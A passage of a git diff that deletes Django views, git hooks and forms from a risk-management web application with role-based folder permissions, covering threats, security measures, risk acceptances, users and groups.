reverse_lazy('riskscenario-list') - template_name = 'snippets/risk_scenario_delete_modal.html' - - def get_success_url(self) -> str: - return reverse_lazy('riskscenario-list') - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="delete_riskscenario"), folder=self.get_object().analysis.project.folder) - - -class SecurityMeasureListView(BaseContextMixin, UserPassesTestMixin, ListView): - template_name = 'core/mtg_list.html' - context_object_name = 'measures' - - ordering = 'created_at' - paginate_by = PAGINATE_BY - model = SecurityMeasure - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - queryset = self.get_queryset() - filter = SecurityMeasureFilter(self.request.GET, queryset=queryset, request=self.request) - context['filter'] = filter - context['measure_create_form'] = SecurityMeasureCreateForm(user=self.request.user) - (context['object_ids_view'], context['object_ids_change'], context['object_ids_delete']) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, SecurityMeasure) - context['add_securitymeasure'] = RoleAssignment.has_permission( - self.request.user, 'add_securitymeasure') - return context - - def get_queryset(self): - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, SecurityMeasure) - qs = self.model.objects.filter( - id__in=object_ids_view).order_by(self.ordering) - filtered_list = SecurityMeasureFilter(self.request.GET, request=self.request, queryset=qs) - return filtered_list.qs - - def test_func(self): - """ - The view is always accessible, only its content is filtered by the queryset - """ - return True - - -class SecurityMeasureCreateViewModal(CreateViewModal, UserPassesTestMixin): - permission_required = 'core.add_securitymeasure' - model = SecurityMeasure - context_object_name = 'measure' - form_class = SecurityMeasureCreateForm - - def form_invalid(self, form): - if is_ajax(request=self.request): - errors = form.errors.as_json() - return JsonResponse({'success': False, 'errors': errors}) - return super().form_invalid(form) - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="add_securitymeasure"), folder=Folder.objects.get(id=self.request.POST['folder'])) - - -class SecurityMeasureUpdateView(BaseContextMixin, UserPassesTestMixin, UpdateView): - model = SecurityMeasure - template_name = 'core/mtg_update.html' - context_object_name = 'security_measure' - form_class = SecurityMeasureUpdateForm - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context['risk_scenarios'] = RiskScenario.objects.filter( - security_measures=self.get_object()) - context['crumbs'] = {'securitymeasure-list': _('Security measures')} - return context - - def get_success_url(self) -> str: - if (self.request.POST.get('next', '/') == ""): - return reverse_lazy('securitymeasure-list') - else: - return self.request.POST.get('next', '/') - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="change_securitymeasure"), folder=self.get_object().folder) - - -class SecurityMeasureDeleteView(UserPassesTestMixin, DeleteView): - model = SecurityMeasure - success_url = reverse_lazy('securitymeasure-list') - template_name = 'snippets/measure_delete_modal.html' - - def get_success_url(self) -> str: - return reverse_lazy('securitymeasure-list') - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="delete_securitymeasure"), folder=self.get_object().folder) - - -class SecurityFunctionListView(BaseContextMixin, UserPassesTestMixin, ListView): - template_name = 'core/security_function_list.html' - context_object_name = 'functions' - - ordering = 'created_at' - paginate_by = PAGINATE_BY - model = SecurityFunction - - def get_queryset(self): - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, SecurityFunction) - qs = self.model.objects.filter( - id__in=object_ids_view).order_by(self.ordering) - filtered_list = SecurityFunctionFilter( - self.request.GET, queryset=qs, request=self.request) - return filtered_list.qs - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - queryset = self.get_queryset() - filter = SecurityFunctionFilter(self.request.GET, request=self.request, queryset=queryset) - context['filter'] = filter - context['security_function_create_form'] = SecurityFunctionCreateForm - (context['object_ids_view'], context['object_ids_change'], context['object_ids_delete']) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, SecurityFunction) - context['add_securityfunction'] = RoleAssignment.has_permission( - self.request.user, 'add_securityfunction') - return context - - def test_func(self): - """ - The view is always accessible, only its content is filtered by the queryset - """ - return True - - -class SecurityFunctionCreateViewModal(UserPassesTestMixin, CreateViewModal): - model = SecurityFunction - context_object_name = 'function' - form_class = SecurityFunctionCreateForm - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="add_securityfunction"), folder=Folder.get_root_folder()) - - -class SecurityFunctionUpdateView(BaseContextMixin, UserPassesTestMixin, UpdateView): - model = SecurityFunction - template_name = 'core/security_function_update.html' - context_object_name = 'function' - form_class = SecurityFunctionUpdateForm - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context['crumbs'] = {'securityfunction-list': _('Security functions')} - return context - - def get_success_url(self) -> str: - if (self.request.POST.get('next', '/') == ""): - return reverse_lazy('securityfunction-list') - else: - return self.request.POST.get('next', '/') - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="change_securityfunction"), folder=self.get_object().folder) - - -class SecurityFunctionDeleteView(UserPassesTestMixin, DeleteView): - model = SecurityFunction - success_url = reverse_lazy('securityfunction-list') - template_name = 'snippets/security_function_delete_modal.html' - - def get_success_url(self) -> str: - return reverse_lazy('securityfunction-list') - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="delete_securityfunction"), folder=self.get_object().folder) - - -class ThreatListView(BaseContextMixin, UserPassesTestMixin, ListView): - template_name = 'core/threat_list.html' - context_object_name = 'threats' - - ordering = 'created_at' - paginate_by = PAGINATE_BY - model = Threat - - def get_queryset(self): - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, Threat) - qs = self.model.objects.filter( - id__in=object_ids_view).order_by(self.ordering) - filtered_list = ThreatFilter( - self.request.GET, queryset=qs, request=self.request) - return filtered_list.qs - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - queryset = self.get_queryset() - filter = ThreatFilter(self.request.GET, request=self.request, queryset=queryset) - context['filter'] = filter - context['threat_create_form'] = ThreatCreateForm - (context['object_ids_view'], context['object_ids_change'], context['object_ids_delete']) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, Threat) - context['add_threat'] = RoleAssignment.has_permission( - self.request.user, 'add_threat') - return context - - def test_func(self): - """ - The view is always accessible, only its content is filtered by the queryset - """ - return True - - -class ThreatCreateViewModal(UserPassesTestMixin, CreateViewModal): - model = Threat - context_object_name = 'threat' - form_class = ThreatCreateForm - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="add_threat"), folder=Folder.get_root_folder()) - - -class ThreatUpdateView(BaseContextMixin, UserPassesTestMixin, UpdateView): - model = Threat - template_name = 'core/threat_update.html' - context_object_name = 'threat' - form_class = ThreatUpdateForm - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context['crumbs'] = {'threat-list': _('Threats')} - return context - - def get_success_url(self) -> str: - if (self.request.POST.get('next', '/') == ""): - return reverse_lazy('threat-list') - else: - return self.request.POST.get('next', '/') - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="change_threat"), folder=self.get_object().folder) - - -class ThreatDeleteView(UserPassesTestMixin, DeleteView): - model = Threat - success_url = reverse_lazy('threat-list') - template_name = 'snippets/threat_delete_modal.html' - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="delete_threat"), folder=self.get_object().folder) - - -class RiskAcceptanceListView(BaseContextMixin, UserPassesTestMixin, ListView): - template_name = 'core/acceptance_list.html' - context_object_name = 'acceptances' - - ordering = 'created_at' - paginate_by = PAGINATE_BY - model = RiskAcceptance - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - queryset = self.get_queryset() - filter = RiskAcceptanceFilter( - self.request.GET, queryset=queryset, request=self.request) - context['filter'] = filter - context['risk_acceptance_create_form'] = RiskAcceptanceCreateUpdateForm(user=self.request.user) - (context['object_ids_view'], context['object_ids_change'], context['object_ids_delete']) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, RiskAcceptance) - context['add_riskacceptance'] = RoleAssignment.has_permission( - self.request.user, 'add_riskacceptance') - context['blocked_states'] = ('accepted', 'rejected', 'revoked') - return context - - def get_queryset(self): - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, RiskAcceptance) - qs = self.model.objects.filter( - id__in=object_ids_view).order_by(self.ordering) - filtered_list = RiskAcceptanceFilter( - self.request.GET, queryset=qs, request=self.request) - return filtered_list.qs - - def test_func(self): - """ - The view is always accessible, only its content is filtered by the queryset - """ - return True - - -class RiskAcceptanceCreateViewModal(UserPassesTestMixin, CreateViewModal): - model = RiskAcceptance - context_object_name = 'acceptance' - form_class = RiskAcceptanceCreateUpdateForm - - def get_form_kwargs(self): - form = super().get_form_kwargs() - form['user'] = self.request.user - return form - - def form_valid(self, form): - self.object = form.save(commit=False) - if self.object.validator: - # Mettre à jour le paramètre "state" - self.object.set_state('submitted') - self.object.save() - messages.success(self.request, _("Risk acceptance submitted to: ") + self.object.validator.email) - return super().form_valid(form) - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="add_riskacceptance"), folder=Folder.objects.get(id=self.request.POST['folder'])) - - -class RiskAcceptanceUpdateView(BaseContextMixin, UserPassesTestMixin, UpdateView): - permission_required = 'core.change_riskacceptance' - model = RiskAcceptance - template_name = 'core/risk_acceptance_update.html' - context_object_name = 'acceptance' - form_class = RiskAcceptanceCreateUpdateForm - - def get_form_kwargs(self): - form = super().get_form_kwargs() - form['user'] = self.request.user - return form - - def form_valid(self, form): - self.object = form.save(commit=False) - if self.object.validator and self.object.state == 'created': - # Mettre à jour le paramètre "state" - self.object.set_state('submitted') - self.object.save() - messages.success(self.request, _("Risk acceptance submitted to: ") + self.object.validator.email) - elif not self.object.validator and self.object.state == 'submitted': - # Mettre à jour le paramètre "state" - self.object.set_state('created') - self.object.save() - return super().form_valid(form) - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context["crumbs"] = {'riskacceptance-list': _('Risk acceptances')} - return context - - def get_success_url(self) -> str: - if (self.request.POST.get('next', '/') == ""): - return reverse_lazy('riskacceptance-list') - else: - return self.request.POST.get('next', '/') - - def test_func(self): - return (RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="change_riskacceptance"), folder=self.get_object().folder) and self.get_object().state not in ('accepted', 'rejected', 'revoked')) - - -class RiskAcceptanceDeleteView(UserPassesTestMixin, DeleteView): - model = RiskAcceptance - success_url = reverse_lazy('riskacceptance-list') - template_name = 'snippets/risk_acceptance_delete_modal.html' - - success_url = reverse_lazy('riskacceptance-list') - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="delete_riskacceptance"), folder=self.get_object().folder) - - -class MyProfileDetailView(BaseContextMixin, UserPassesTestMixin, DetailView): - template_name = 'core/my_profile_detailed.html' - context_object_name = 'user' - - model = User - - def get_object(self, queryset: Optional[models.query.QuerySet[Any]] = ...) -> models.Model: - return self.request.user - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - if not UserGroup.get_user_groups(self.request.user): - messages.warning(self.request, _( - "Warning! You are not assigned to any group. Without a group you will not have access to any functionality. Please contact you administrator.")) - context['user_groups'] = self.object.user_groups.all() - keys = [_('Last name'), _('First name'), _('Email'), _('Entry date'), _('Superuser')] - values = [] - for key, value in model_to_dict(self.object, fields=['last_name', 'first_name', 'email', 'date_joined']).items(): - values.append(value) - context['user_fields'] = dict(zip(keys, values)) - roles = [] - for user_group in self.object.user_groups.all(): - for role_assignment in user_group.roleassignment_set.all(): - roles.append(role_assignment.role.name) - context['roles'] = roles - return context - - def test_func(self): - return self.request.user.is_authenticated - - -class MyProfileUpdateView(BaseContextMixin, UserPassesTestMixin, UpdateView): - template_name = 'core/user_update.html' - context_object_name = 'user' - form_class = MyProfileUpdateForm - - model = User - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - return context - - def get_form_kwargs(self): - kwargs = super().get_form_kwargs() - kwargs["user"] = get_object_or_404(User, pk=self.kwargs['pk']) - print('DEBUG: User =', get_object_or_404(User, pk=self.kwargs['pk'])) - return kwargs - - def get_success_url(self) -> str: - if (self.request.POST.get('next', '/') == ""): - return reverse_lazy('index') - else: - return self.request.POST.get('next', '/') - - def test_func(self): - return self.request.user == get_object_or_404(User, pk=self.kwargs['pk']) - - -class UserListView(BaseContextMixin, UserPassesTestMixin, ListView): - template_name = 'core/user_list.html' - context_object_name = 'users' - - ordering = 'created_at' - paginate_by = PAGINATE_BY - model = User - - def get_queryset(self): - qs = self.model.objects.all().order_by( - '-is_active', '-is_superuser', 'email', 'id') - filtered_list = UserFilter( - self.request.GET, queryset=qs, request=self.request) - return filtered_list.qs - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - queryset = self.get_queryset() - filter = UserFilter(self.request.GET, request=self.request, queryset=queryset) - context['filter'] = filter - context['users_number'] = User.objects.all().count() - context['users_number_limit'] = MAX_USERS - - return context - - - def test_func(self): - return RoleAssignment.has_permission(user=self.request.user, codename="view_user") - - -class UserCreateView(BaseContextMixin, UserPassesTestMixin, CreateView): - template_name = 'core/user_create.html' - context_object_name = 'user' - form_class = UserCreateForm - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context["crumbs"] = {'user-list': _('Users')} - return context - - def get_success_url(self) -> str: - return reverse_lazy('user-list') - - def post(self, request, *args, **kwargs): - form = self.form_class(request.POST) - if form.is_valid(): - data = form.cleaned_data['email'] - try: - User.objects.create_user(email=data) - messages.success(request, _('User created and email send successfully.')) - return redirect("user-list") - except Exception as e: - messages.error(request, "An error has occured during user creation. If he has not received the mail, please use the forgot link on login page.") - print("Exception:", e) - return redirect("user-list") - return render(request, self.template_name, {'form': form}) - - def test_func(self): - return RoleAssignment.has_permission(user=self.request.user, codename="add_user") - - -class UserUpdateView(BaseContextMixin, UserPassesTestMixin, UpdateView): - template_name = 'core/user_update.html' - context_object_name = 'user' - form_class = UserUpdateForm - - model = User - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context["crumbs"] = {'user-list': _('Users')} - return context - - def get_form_kwargs(self): - kwargs = super().get_form_kwargs() - kwargs["user"] = get_object_or_404(User, pk=self.kwargs['pk']) - print('DEBUG: User =', get_object_or_404(User, pk=self.kwargs['pk'])) - return kwargs - - def get_success_url(self) -> str: - if (self.request.POST.get('next', '/') == ""): - return reverse_lazy('user-list') - else: - return self.request.POST.get('next', '/') - - def test_func(self): - return RoleAssignment.has_permission(user=self.request.user, codename="change_user") - - -class UserDeleteView(UserPassesTestMixin, DeleteView): - model = User - success_url = reverse_lazy('user-list') - template_name = 'snippets/user_delete_modal.html' - - def get_success_url(self) -> str: - return reverse_lazy('user-list') - - def test_func(self): - return RoleAssignment.has_permission(user=self.request.user, codename="delete_user") - - -class UserGroupListView(BaseContextMixin, UserPassesTestMixin, ListView): - template_name = 'core/group_list.html' - context_object_name = 'user_groups' - - ordering = 'folder' - paginate_by = PAGINATE_BY - model = UserGroup - - def get_queryset(self): - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.objects.get( - content_type=Folder.ContentType.ROOT), self.request.user, UserGroup - ) - qs = self.model.objects.filter( - id__in=object_ids_view).order_by(self.ordering) - filtered_list = UserGroupFilter( - self.request.GET, queryset=qs, request=self.request) - return filtered_list.qs - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - queryset = self.get_queryset() - filter = UserGroupFilter(self.request.GET, request=self.request, queryset=queryset) - context['filter'] = filter - (context['object_ids_view'], context['object_ids_change'], context['object_ids_delete']) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, UserGroup - ) - context['add_usergroup'] = RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="add_usergroup"), folder=Folder.get_root_folder()) - return context - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="view_usergroup"), folder=Folder.get_root_folder()) - - -class UserGroupCreateView(UserPassesTestMixin, CreateView): - template_name = 'core/group_create.html' - context_object_name = 'user_group' - form_class = UserGroupCreateForm - - def get_success_url(self) -> str: - return reverse_lazy('usergroup-list') - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="add_usergroup"), folder=Folder.objects.get(id=self.request.POST['folder'])) - - -class UserGroupUpdateView(BaseContextMixin, UserPassesTestMixin, UpdateView): - template_name = 'core/group_update.html' - context_object_name = 'user_group' - form_class = UserGroupUpdateForm - - model = UserGroup - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context['users'] = User.objects.exclude(user_groups=self.get_object()) - context["associated_users"] = User.objects.filter( - user_groups=self.get_object()) - context["crumbs"] = {'usergroup-list': _('User groups')} - return context - - def get_success_url(self) -> str: - return reverse_lazy('usergroup-list') - - def test_func(self): - user_group = self.get_object() - return not (user_group.builtin) and RoleAssignment.is_access_allowed(user=self.request.user, - perm=Permission.objects.get( - codename="change_usergroup"), - folder=Folder.get_folder(user_group)) - - -class UserGroupDeleteView(UserPassesTestMixin, DeleteView): - model = UserGroup - success_url = reverse_lazy('usergroup-list') - template_name = 'snippets/group_delete_modal.html' - - def get_success_url(self) -> str: - return reverse_lazy('usergroup-list') - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="delete_usergroup"), folder=self.get_object().folder) - - -class RoleAssignmentListView(BaseContextMixin, UserPassesTestMixin, ListView): - permission_required = 'core.view_roleassignment' - template_name = 'core/role_list.html' - context_object_name = 'assignments' - - ordering = 'created_at' - paginate_by = PAGINATE_BY - model = RoleAssignment - - def setup(self, request, *args, **kwargs): - super().setup(request, *args, **kwargs) - messages.info(self.request, _("Role assignment editing will be available in a future release. Currently you have to attach users to groups to assign roles.")) - - def get_queryset(self): - qs = self.model.objects.all().order_by('id') - filtered_list = UserGroupFilter( - self.request.GET, queryset=qs, request=self.request) - return filtered_list.qs - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - queryset = self.get_queryset() - filter = UserGroupFilter(self.request.GET, request=self.request, queryset=queryset) - context['filter'] = filter - context['roles'] = Role.objects.all().order_by('id') - return context - - def test_func(self): - return True - - -class RoleAssignmentCreateView(BaseContextMixin, UserPassesTestMixin, CreateView): - permission_required = 'core.add_roleassignment' - template_name = 'core/role_assignment_create.html' - context_object_name = 'assignment' - form_class = RoleAssignmentCreateForm - - def get_success_url(self) -> str: - return reverse_lazy('role-list') - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context["crumbs"] = {'role-list': _('Role assignment')} - return context - - def test_func(self): - # TODO: Change this when we allow picking a folder for role assignments - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="add_roleassignment"), folder=Folder.get_root_folder()) - - -class RoleAssignmentDeleteView(UserPassesTestMixin, DeleteView): - permission_required = 'core.delete_roleassignment' - model = RoleAssignment - success_url = reverse_lazy('role-list') - template_name = 'snippets/role_assignment_delete_modal.html' - - def get_success_url(self) -> str: - return reverse_lazy('role-list') - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="delete_roleassignment"), folder=Folder.get_folder(self.get_object())) - - -class RoleAssignmentUpdateView(BaseContextMixin, UserPassesTestMixin, UpdateView): - permission_required = 'auth.change_role' - template_name = 'core/role_update.html' - context_object_name = 'role' - form_class = RoleAssignmentUpdateForm - - model = Role - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context["crumbs"] = {'usergroup-list': _('User groups')} - return context - - def get_success_url(self) -> str: - return reverse_lazy('role-list') - - def test_func(self): - ra = get_object_or_404(RoleAssignment, pk=self.kwargs['pk']) - return not (ra.builtin) and RoleAssignment.is_access_allowed(user=self.request.user, - perm=Permission.objects.get(codename="change_roleassignment"), folder=Folder.get_folder(ra)) - - -class UserPasswordChangeView(BaseContextMixin, UserPassesTestMixin, PasswordChangeView): - """ view to change user password """ - template_name = 'core/password_change.html' - form_class = UserPasswordChangeForm - model = User - - def get_success_url(self) -> str: - self.object = get_object_or_404(User, pk=self.kwargs['pk']) - if self.object == self.request.user: - return reverse_lazy("me-update", kwargs={'pk': self.request.user.id}) - return reverse_lazy("user-update", kwargs={'pk': self.object.id}) - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context['this_user'] = get_object_or_404(User, pk=self.kwargs['pk']) - context["crumbs"] = {'user-list': _('Users')} - return context - - def get_form_kwargs(self): - kwargs = super().get_form_kwargs() - kwargs["user"] = get_object_or_404(User, pk=self.kwargs['pk']) - # print('DEBUG: User =', get_object_or_404(User, pk=self.kwargs['pk'])) - return kwargs - - def test_func(self): - return RoleAssignment.has_permission(user=self.request.user, codename="change_user") or self.request.user == get_object_or_404(User, pk=self.kwargs['pk']) - - -class RiskMatrixListView(BaseContextMixin, UserPassesTestMixin, ListView): - template_name = 'core/risk_matrix_list.html' - context_object_name = 'matrices' - - ordering = 'created_at' - paginate_by = PAGINATE_BY - model = RiskMatrix - - def get_queryset(self): - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, RiskMatrix) - qs = self.model.objects.all().order_by('created_at') - filtered_list = RiskMatrixFilter( - self.request.GET, queryset=qs, request=self.request) - return filtered_list.qs - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context["object_ids_change"] = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, RiskMatrix)[1] - context["object_ids_delete"] = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, RiskMatrix)[2] - context['add_riskmatrix'] = RoleAssignment.has_permission( - self.request.user, 'add_riskmatrix') - queryset = self.get_queryset() - filter = RiskMatrixFilter(self.request.GET, request=self.request, queryset=queryset) - context['filter'] = filter - return context - - def test_func(self): - """ - The view is always accessible, only its content is filtered by the queryset - """ - return True - - -class RiskMatrixDetailView(BaseContextMixin, UserPassesTestMixin, DetailView): - template_name = 'core/risk_matrix_detailed.html' - context_object_name = 'matrix' - - model = RiskMatrix - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context['change_riskmatrix'] = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), self.request.user, RiskMatrix)[1] - context['viewable_projects'] = Project.objects.filter( - id__in=RoleAssignment.get_accessible_object_ids(Folder.get_root_folder(), self.request.user, Project)[0]).filter( - id__in=(self.get_object().projects.all().values_list('id', flat=True))) - context['viewable_analyses'] = Analysis.objects.filter( - id__in=RoleAssignment.get_accessible_object_ids(Folder.get_root_folder(), self.request.user, Analysis)[0]).filter( - id__in=(self.get_object().analyses.all().values_list('id', flat=True))) - context['changeable_analyses'] = Analysis.objects.filter( - id__in=RoleAssignment.get_accessible_object_ids(Folder.get_root_folder(), self.request.user, Analysis)[1]).filter( - id__in=(self.get_object().analyses.all().values_list('id', flat=True))) - context["crumbs"] = {'riskmatrix-list': _('Matrices')} - return context - - def test_func(self): - """ - The view is always accessible, only its content is filtered by the queryset - """ - return True - - -class RiskMatrixUpdateView(BaseContextMixin, UserPassesTestMixin, UpdateView): - template_name = 'core/risk_matrix_update.html' - context_object_name = 'matrix' - form_class = RiskMatrixUpdateForm - - model = RiskMatrix - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context["crumbs"] = {'riskmatrix-list': _('Matrices')} - return context - - def get_success_url(self) -> str: - if (self.request.POST.get('next', '/') == ""): - return reverse_lazy('riskmatrix-list') - else: - return self.request.POST.get('next', '/') - - def test_func(self): - return RoleAssignment.is_access_allowed(user=self.request.user, perm=Permission.objects.get(codename="change_riskmatrix"), folder=Folder.get_folder(self.get_object())) - - -def license_overview(request): - template = 'license/overview.html' - context = {} - - context['matrices'] = list( - RiskMatrix.objects.all().values_list('json_definition', flat=True)) - context['change_usergroup'] = RoleAssignment.is_access_allowed(user=request.user, perm=Permission.objects.get(codename="change_usergroup"), folder=Folder.get_root_folder()) - context['view_user'] = RoleAssignment.has_permission( - request.user, "view_user") - context['exceeded_users'] = (MAX_USERS - User.objects.all().count()) < 0 - - context['users_number'] = User.objects.all().count() - context['users_number_limit'] = MAX_USERS - context['licence_deployment'] = LICENCE_DEPLOYMENT - context['licence_expiration'] = LICENCE_EXPIRATION - context['licence_support'] = LICENCE_SUPPORT - context['licence_type'] = LICENCE_TYPE - - return render(request, template, context) diff --git a/db/readme.txt b/db/readme.txt deleted file mode 100644 index d481c47..0000000 --- a/db/readme.txt +++ /dev/null @@ -1 +0,0 @@ -Directory where the database volume shall be mounted diff --git a/git_hooks/post-commit b/git_hooks/post-commit deleted file mode 100755 index 0e4fcef..0000000 --- a/git_hooks/post-commit +++ /dev/null @@ -1,3 +0,0 @@ -#!/usr/bin/env bash - -exec mira/scripts/generate_build_file.sh > mira/build.json \ No newline at end of file diff --git a/git_hooks/post-merge b/git_hooks/post-merge deleted file mode 100755 index 0e4fcef..0000000 --- a/git_hooks/post-merge +++ /dev/null @@ -1,3 +0,0 @@ -#!/usr/bin/env bash - -exec mira/scripts/generate_build_file.sh > mira/build.json \ No newline at end of file diff --git a/iam/__init__.py b/iam/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/iam/apps.py b/iam/apps.py deleted file mode 100644 index 235cf12..0000000 --- a/iam/apps.py +++ /dev/null @@ -1,6 +0,0 @@ -from django.apps import AppConfig - - -class IamConfig(AppConfig): - default_auto_field = 'django.db.models.BigAutoField' - name = 'iam' diff --git a/iam/forms.py b/iam/forms.py deleted file mode 100644 index e5ee41a..0000000 --- a/iam/forms.py +++ /dev/null @@ -1,226 +0,0 @@ -""" this module contains forms related to iam app -""" -from django.forms import CheckboxInput, DateInput, DateTimeInput, EmailInput, \ - HiddenInput, ModelForm, NullBooleanSelect, NumberInput, PasswordInput, Select, \ - SelectMultiple, TextInput, Textarea, TimeInput, URLInput, ValidationError -from django.contrib.auth.forms import UserChangeForm, AdminPasswordChangeForm -from django.urls import reverse -from django.utils.translation import gettext_lazy as _ -from django.contrib.auth import password_validation -from django import forms -from .models import Folder, User, UserGroup, RoleAssignment, Role - -from core.forms import SearchableCheckboxSelectMultiple - - -class DefaultDateInput(DateInput): - """ default date for input """ - input_type = 'date' - - -class StyledModelForm(ModelForm): - """ a nice ModelForm """ - - def __init__(self, *args, **kwargs): - # pragma pylint: disable=no-member - super(__class__, self).__init__(*args, **kwargs) - text_inputs = (TextInput, NumberInput, EmailInput, URLInput, PasswordInput, - HiddenInput, DefaultDateInput, DateInput, DateTimeInput, TimeInput) - select_inputs = (Select, SelectMultiple, NullBooleanSelect) - for fname, f in self.fields.items(): - input_type = f.widget.__class__ - if self.Meta.model: - model_name = str(self.Meta.model).split( - '.')[-1].strip("'>").lower() - if input_type in text_inputs: - f.widget.attrs['id'] = f'id_{model_name}_{fname}' if model_name else f'id_{fname}' - f.widget.attrs['class'] = 'bg-gray-50 border border-gray-300 text-gray-900 text-sm rounded-lg focus:ring-blue-500 focus:border-blue-500 block w-full p-2.5' - if input_type in select_inputs: - f.widget.attrs['id'] = f'id_{model_name}_{fname}' - f.widget.attrs['class'] = 'bg-gray-50 border border-gray-300 text-gray-900 text-sm rounded-lg focus:ring-blue-500 focus:border-blue-500 block w-full p-2.5' - if input_type == Textarea: - f.widget.attrs['class'] = 'block p-2.5 w-full text-sm text-gray-900 bg-gray-50 rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500' - if input_type == CheckboxInput: - f.widget.attrs['id'] = f'id_{model_name}_{fname}' - f.widget.attrs['class'] = 'w-4 h-4 text-blue-600 bg-gray-100 border-gray-300 rounded focus:ring-blue-500' - if input_type == DefaultDateInput: - f.widget.attrs['id'] = f'id_{model_name}_{fname}' - f.widget.attrs['class'] = 'bg-gray-50 border border-gray-300 text-gray-900 text-sm rounded-lg focus:ring-blue-500 focus:border-blue-500 block w-full p-2.5' - - -class FolderUpdateForm(StyledModelForm): - """ form to update a folder """ - # pragma pylint: disable=no-member - - class Meta: - """ for Model """ - model = Folder - exclude = ['content_type', 'builtin', 'hide_public_asset', - 'hide_public_matrix', 'hide_public_threat', 'hide_public_security_function', 'parent_folder'] - - -class UserCreationForm(forms.ModelForm): - """A form for creating new users""" - email = forms.EmailField(max_length=100) - - - class Meta: - model = User - fields = ('email',) - - def clean_email(self): - email = self.cleaned_data.get("email") - return email.lower() - - def clean_password2(self): - password1 = self.cleaned_data.get("password1") - password2 = self.cleaned_data.get("password2") - if password1 and password2 and password1 != password2: - raise ValidationError( - self.error_messages['password_mismatch'], - code='password_mismatch', - ) - return password2 - - def _post_clean(self): - super()._post_clean() - # Validate the password after self.instance is updated with form data - # by super(). - password = self.cleaned_data.get('password2') - if password: - try: - password_validation.validate_password(password, self.instance) - except ValidationError as error: - self.add_error('password2', error) - - def save(self, commit=True): - # Save the provided password in hashed format - user = super().save(commit=False) - user.set_password(self.cleaned_data["password1"]) - if commit: - user.save() - return user - - -class UserCreateForm(UserCreationForm, StyledModelForm): - """ form to create user """ - pass - - -class UserUpdateForm(UserChangeForm, StyledModelForm): - """ form to update user """ - - def __init__(self, *args, user, **kwargs): - self.user = user - super().__init__(*args, **kwargs) - password = self.fields.get('password') - self.fields['password'].help_text = _( - 'Raw passwords are not stored, so there is no way to see this ' - 'user’s password, but you can change the password using 